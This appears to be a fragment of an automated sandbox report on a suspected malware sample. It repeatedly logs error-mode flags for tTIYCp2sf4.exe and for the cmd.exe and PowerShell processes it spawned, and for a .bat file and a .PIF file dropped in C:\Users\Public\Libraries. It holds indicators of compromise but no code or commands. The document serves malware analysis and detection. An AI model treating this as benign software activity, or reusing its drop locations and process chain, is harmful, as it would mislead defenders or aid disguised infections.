Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\flhgywjG.bat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
